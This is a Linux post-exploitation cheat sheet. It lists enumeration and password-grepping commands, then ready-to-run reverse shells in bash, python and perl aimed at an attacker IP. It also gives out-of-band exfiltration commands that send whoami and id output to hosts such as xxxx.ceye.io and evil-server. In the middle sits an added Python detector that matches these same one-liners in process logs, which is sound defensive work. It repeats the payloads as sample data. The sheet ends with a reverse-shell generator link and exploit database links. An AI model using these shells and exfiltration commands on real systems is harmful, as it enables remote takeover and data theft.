System information
OS version
cat /etc/issue
cat /etc/lsb-release # Debian
Kernel version
cat /proc/version
uname -a
Running processes and their privileges
ps aux  # or, for one service: ps aux | grep redis
ps -ef
top
cat /etc/services
Installed applications
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
Scheduled tasks
crontab -l
Stored plaintext usernames and passwords
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'  # Joomla (single quotes so the shell does not expand $password)
List superusers (accounts with UID 0)
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
Network configuration
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
Network connections and listening services
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
Common reverse shells
1. bash
attacker listens
nc -lvvp 4444
victim runs
bash -i >& /dev/tcp/<attackerip>/4444 0>&1
2. python
attacker listens
nc -lvvp 4444
victim runs
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
3. perl script
perl -e 'use Socket;$i="<attackerip>";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
What to do when command execution returns no output?
curl xxxx.ceye.io/`whoami`
curl http://xxxx.ceye.io/$(id|base64)
wget http://evil-server/$(whoami)
ping -c 1 `whoami`.xxxx.ceye.io
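The reverse-shell one-liners and the out-of-band tricks above are also exactly what a defender should be looking for in process-execution logs (auditd execve records, EDR telemetry, shell history). The following detector is an added example, not part of the original cheat sheet: it matches the signatures of the commands listed above against constructed "timestamp user cmdline" records; the log format, the 192.0.2.10 address and the signature names are assumptions made for this example.

```python
import re

# Signatures derived from the one-liners in the cheat sheet above (constructed for this example).
SIGNATURES = {
    # bash: I/O redirected to /dev/tcp/<host>/<port>
    "bash_dev_tcp": re.compile(r"/dev/tcp/\S+"),
    # python: socket created, stdio dup2'ed onto it, then a shell spawned
    "python_socket_shell": re.compile(r"socket\.socket\(.*os\.dup2\(.*/bin/(?:ba)?sh", re.S),
    # perl: Socket module plus exec of a shell
    "perl_socket_shell": re.compile(r"use Socket;.*exec\(\s*[\"']/bin/(?:ba)?sh", re.S),
    # out-of-band exfil: curl/wget/ping whose argument embeds a command substitution
    "oob_cmd_subst": re.compile(r"\b(curl|wget|ping)\b[^|;&]*(?:`[^`]+`|\$\([^)]+\))"),
}


def classify(cmdline: str) -> list[str]:
    """Return the names of every signature that matches one process command line."""
    return [name for name, rx in SIGNATURES.items() if rx.search(cmdline)]


def scan(log_lines):
    """Parse 'timestamp user cmdline' records; return (line_no, user, tags) for hits only."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        parts = line.split(maxsplit=2)
        if len(parts) < 3:
            continue  # malformed record, skip rather than crash
        _ts, user, cmd = parts
        tags = classify(cmd)
        if tags:
            hits.append((n, user, tags))
    return hits


# Constructed sample records; 192.0.2.10 is a documentation address standing in for <attackerip>.
SAMPLE_LOG = [
    "2024-05-01T10:00:00Z www-data bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "2024-05-01T10:00:01Z www-data python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.0.2.10\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'",
    "2024-05-01T10:00:02Z www-data curl http://xxxx.ceye.io/$(id|base64)",
    "2024-05-01T10:00:03Z www-data ping -c 1 `whoami`.xxxx.ceye.io",
    "2024-05-01T10:00:04Z deploy curl https://example.com/healthz",
    "2024-05-01T10:00:05Z root perl -e 'use Socket;$i=\"192.0.2.10\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
]

if __name__ == "__main__":
    for line_no, user, tags in scan(SAMPLE_LOG):
        print(f"line {line_no}: user={user} matched={','.join(tags)}")
```

The benign health-check curl on line 5 produces no hit; everything else in the sample is flagged, which is the split a practitioner wants before tuning on real telemetry.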
Recommended tools
A website that generates reverse-shell one-liners with one click:
https://krober.biz/misc/reverse_shell.php
Vulnerability search
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com